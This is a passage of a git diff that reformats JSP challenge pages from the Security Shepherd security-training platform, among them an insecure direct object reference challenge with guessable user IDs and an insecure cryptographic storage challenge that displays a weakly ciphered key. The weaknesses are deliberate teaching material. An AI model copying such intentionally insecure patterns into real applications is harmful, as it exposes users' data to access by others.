+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.instruction") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="searchTerm" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.getUser") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.instruction") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="searchTerm" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.getUser") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theSearchTerm = $("#searchTerm").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    searchTerm: theSearchTerm,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theSearchTerm = $("#searchTerm").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							searchTerm: theSearchTerm,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.jsp b/src/main/webapp/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.jsp
index f57912008..0ae80accb 100644
--- a/src/main/webapp/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.jsp
+++ b/src/main/webapp/challenges/vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4.jsp
@@ -1,156 +1,159 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Insecure Direct Object References Challenge Two
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * Insecure Direct Object References Challenge Two
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "Insecure Direct Object References Challenge Two";
-    String levelHash = "vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4";
-
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.directObject." + levelHash, locale);
-    //Used more than once translations
-    String i18nChallengeName = bundle.getString("challenge.challengeName");
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            String ApplicationRoot = getServletContext().getRealPath("");
+ String levelName = "Insecure Direct Object References Challenge Two";
+ String levelHash = "vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4";
+ 
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.directObject." + levelHash, locale);
+ //Used more than once translations
+ String i18nChallengeName = bundle.getString("challenge.challengeName");
+	
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		String ApplicationRoot = getServletContext().getRealPath("");
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nChallengeName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nChallengeName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nChallengeName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.whatToDo") %>
-        <br/> <br/>
-        <center>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                </td>
-                <select id='userId' style='width: 300px;' multiple>
-                    <option value="c81e728d9d4c2f636f067f89cc14862c">Paul
-                        Bourke
-                    </option>
-                    <option value="eccbc87e4b5ce2fe28308fd9f2a7baf3">Will
-                        Bailey
-                    </option>
-                    <option value="e4da3b7fbbce2345d7772b0674a318d5">Orla
-                        Cleary
-                    </option>
-                    <option value="8f14e45fceea167a5a36dedd4bea2543">Ronan
-                        Fitzpatrick
-                    </option>
-                    <option value="6512bd43d9caa6e02c990b0a82652dca">Pat
-                        McKenana
-                    </option>
-                </select>
-                </td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input style='width: 300px;' type="submit"
-                               value="<%= bundle.getString("challenge.showProfile") %>"/>
-                    </div>
-                    <p style="display: none; text-align: center;"
-                       id="loadingSign"><%= bundle.getString("challenge.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-    </center>
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var optionValue = $("#userId").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    userId: optionValue
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nChallengeName %></h2>
+		<p>
+			<%= bundle.getString("challenge.whatToDo") %>
+			<br /> <br />
+		<center>
+			<form id="leForm" action="javascript:;">
+				<table>
+					<tr>
+						</td>
+						<select id='userId' style='width: 300px;' multiple>
+							<option value="c81e728d9d4c2f636f067f89cc14862c">Paul
+								Bourke</option>
+							<option value="eccbc87e4b5ce2fe28308fd9f2a7baf3">Will
+								Bailey</option>
+							<option value="e4da3b7fbbce2345d7772b0674a318d5">Orla
+								Cleary</option>
+							<option value="8f14e45fceea167a5a36dedd4bea2543">Ronan
+								Fitzpatrick</option>
+							<option value="6512bd43d9caa6e02c990b0a82652dca">Pat
+								McKenana</option>
+						</select>
+						</td>
+					</tr>
+					<tr>
+						<td>
+							<div id="submitButton">
+								<input style='width: 300px;' type="submit"
+									value="<%= bundle.getString("challenge.showProfile") %>" />
+							</div>
+							<p style="display: none; text-align: center;" id="loadingSign"><%= bundle.getString("challenge.loading") %></p>
+						</td>
+					</tr>
+				</table>
+			</form>
+		</center>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var optionValue = $("#userId").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							userId: optionValue
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
 
diff --git a/src/main/webapp/challenges/x9c408d23e75ec92495e0caf9a544edb2ee8f624249f3e920663edb733f15cd7.jsp b/src/main/webapp/challenges/x9c408d23e75ec92495e0caf9a544edb2ee8f624249f3e920663edb733f15cd7.jsp
index bfca012c8..492d7a22c 100644
--- a/src/main/webapp/challenges/x9c408d23e75ec92495e0caf9a544edb2ee8f624249f3e920663edb733f15cd7.jsp
+++ b/src/main/webapp/challenges/x9c408d23e75ec92495e0caf9a544edb2ee8f624249f3e920663edb733f15cd7.jsp
@@ -1,102 +1,109 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Insecure Cryptographic Storage Challenge 1
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * Insecure Cryptographic Storage Challenge 1
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "Insecure Cryptographic Storage Challenge 1";
-
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoStorage", locale);
-    //Used more than once translations
-    String i18nLevelName = bundle.getString("insecureCryptoStorage.1.challengename");
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ String levelName =  "Insecure Cryptographic Storage Challenge 1";
+ 
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoStorage", locale);
+ //Used more than once translations
+ String i18nLevelName = bundle.getString("insecureCryptoStorage.1.challengename");
+ 
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-        <%= bundle.getString("insecureCryptoStorage.1.whatToDo") %>
-        <br/> <br/> <a>Ymj wjxzqy pjd ktw ymnx qjxxts nx ymj ktqqtbnsl
-        xywnsl;
-        rdqtajqdmtwxjwzssnslymwtzlmymjknjqibmjwjfwjdtzltnslbnymdtzwgnlf</a>
-    </p>
-</div>
-<script>
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
-
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("insecureCryptoStorage.1.whatToDo") %>
+			<br /> <br /> <a>Ymj wjxzqy pjd ktw ymnx qjxxts nx ymj ktqqtbnsl
+				xywnsl;
+				rdqtajqdmtwxjwzssnslymwtzlmymjknjqibmjwjfwjdtzltnslbnymdtzwgnlf</a>
+		</p>
+	</div>
+	<script>			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp b/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp
index c4df1e281..4b43dac6c 100644
--- a/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp
+++ b/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp
@@ -1,172 +1,177 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Cross Site Request Forgery Challenge 2
-     *
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelName = "CSRF Challenge 2";
-    String levelHash = new String("z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e");
-
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String ApplicationRoot = getServletContext().getRealPath("");
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userClass = null;
-            if (ses.getAttribute("userClass") != null) {
-                userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
-            }
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+/**
+ * Cross Site Request Forgery Challenge 2
+ *
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
+ String levelName = "CSRF Challenge 2";
+ String levelHash = new String("z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e");
+ 
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
+ 
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String ApplicationRoot = getServletContext().getRealPath("");
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
